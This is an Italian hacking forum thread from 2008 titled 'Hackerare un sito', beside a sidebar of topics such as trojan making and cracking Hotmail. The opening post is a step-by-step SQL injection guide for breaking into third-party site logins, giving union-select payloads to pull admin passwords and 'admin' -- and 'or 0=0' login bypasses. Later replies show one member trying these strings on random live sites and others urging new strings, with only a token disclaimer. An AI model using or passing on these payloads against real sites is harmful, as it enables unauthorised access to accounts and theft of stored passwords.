Ultimi argomenti
» New entry.......
Oggi a 4:56 am Da gual

» impallare pc
Gio Set 25, 2008 7:34 pm Da crispy

» Hackerare un sito
Sab Set 13, 2008 11:52 am Da crispy

» siti k impazziscono
Ven Set 12, 2008 1:33 pm Da crispy

» trojan making
Gio Set 11, 2008 4:19 pm Da nobody

» Cosa Usate Per Graficare????
Mer Set 10, 2008 11:36 pm Da nobody

» vista.......
Mer Set 10, 2008 11:35 pm Da nobody

» recupero password di tutto salvate nel pc
Mer Set 10, 2008 11:34 pm Da nobody

» trucchi carbon
Mer Set 10, 2008 11:32 pm Da nobody

» SPam!!!!""$£"£%$
Ven Set 05, 2008 11:50 am Da NightmarE

» bloccare msn altrui temporaneamente
Gio Set 04, 2008 5:50 pm Da desa_90

» Craccare wga
Gio Set 04, 2008 2:04 pm Da crispy

» migliorARE performance sata
Gio Set 04, 2008 2:02 pm Da crispy

» Craccare hotmail scervellandosi!!
Gio Set 04, 2008 2:00 pm Da crispy

» Fake Mail da telnet
Gio Set 04, 2008 1:59 pm Da crispy

Statistiche
Abbiamo 79 membri registrati
L'ultimo utente registrato è gual

I nostri membri hanno inviato un totale di 503 messaggi in 168 argomenti
Chi è in linea
In totale c'è 0 utente in linea :: 0 Registrato, 0 Nascosto e 0 Ospite

Utenti che stanno navigando nel forum: Nessuno


[ Vedere la lista completa ]


Il numero massimo degli utenti in linea è stato 7 il Sab Mar 22, 2008 10:56 pm

Connesso come Anonymous. La tua ultima visita è stata

Non sei connesso Connettiti o registrati

Vedere l'argomento precedente Vedere l'argomento seguente Andare in basso  Messaggio [Pagina 1 su1]

1 Hackerare un sito il Mar Mar 18, 2008 10:27 pm

NightmarE


immortale
immortale
Sesso:Maschile Bilancia Cane
Andiamo in una pagina che preveda un
login utente, poi dove si inserisce l' userID bisogna inserire
' (l'apostrofo) ed inviare,
non bisogna inserire alcun tipo di password.

Se tutto è andato a buon fine, dovrebbe apparire un messagio del tipo:


Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'



[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query
expression 'ID=''' AND PASSWORD='''.



/scripts/login.asp, line 30



in caso contrario ci apparirà un messagio che ci informa che userID o la
password sono errati ( in questi casi molto probabilmete non sono possibili
azioni maliziose).

Ora tornando alla nostra applicazione modificabile iniziamo a ricercare
informazioni come lo scoprire se esiste o meno un utente admin andando ad
inserire nella zona dell' userID il seguente comando:

' union select min(UserID),1,1,1 from members where
UserID > 'a'--


oppure possiamo tentare di trovare addirittura la
password dell' admin inserendo sempre nel campo dell' userID il comando:


' union select Password,1,1,1 from members where
UserID = 'admin'--



di questi comandi simili ce ne sono parecchi come ad esempio:




admin' --



che ci permette di validarci come admin oppure un' altro comando potrebbe
essere:



' or 0=0 --sp_password



che ci permetterà il login come il primo utente presente nella lista.



Solo a scopo infomatico, quindi pensateci 10 volte prima di fare cazzate

2 Re: Hackerare un sito il Lun Giu 23, 2008 12:30 am

desa_90


comune mortale
comune mortale
Sesso:Maschile Gemelli Cavallo
quali sono i possibili rischi??

3 fefegegegegegegegeg il Lun Giu 23, 2008 6:57 pm

NightmarE


immortale
immortale
Sesso:Maschile Bilancia Cane
i rischi sono i soliti....k se vi beccano vi possono mettere una multa o anche di peggio...ma dipende cosa craccate....

4 Re: Hackerare un sito il Ven Set 05, 2008 6:32 pm

desa_90


comune mortale
comune mortale
Sesso:Maschile Gemelli Cavallo
MI DISP MA NON FUNZIONANO MAI!!!FINORA HO PROVATO IN TUTTI I SITI MA NADA....

5 fgfhfhfhfhfhf il Ven Set 05, 2008 11:52 pm

NightmarE


immortale
immortale
Sesso:Maschile Bilancia Cane
ormai i web desiner iniziano a proteggersi..... cmq ti posso assicuirare k fino a circa un mese fa funzioonavano in abbastanza siti..
ora bisogna trovare stringhe nuove....

6 Re: Hackerare un sito il Sab Set 13, 2008 11:38 am

desa_90


comune mortale
comune mortale
Sesso:Maschile Gemelli Cavallo
per caso sai nuove stringhe???

7 fffffffffffffffff il Sab Set 13, 2008 11:52 am

crispy


comune mortale
comune mortale
Sesso:Maschile Sagittario
dipende da cosa vvuoi fare... cmq se leggi la guida all'sql injection di questo forum.... e bene o male inpari qualcosa.... ma cmq ormai moltissimo siti nn sono piu soggetti a sql purtroppo....

Vedere l'argomento precedente Vedere l'argomento seguente Tornare in alto  Messaggio [Pagina 1 su1]

Permesso del forum:
Non puoi rispondere agli argomenti in questo forum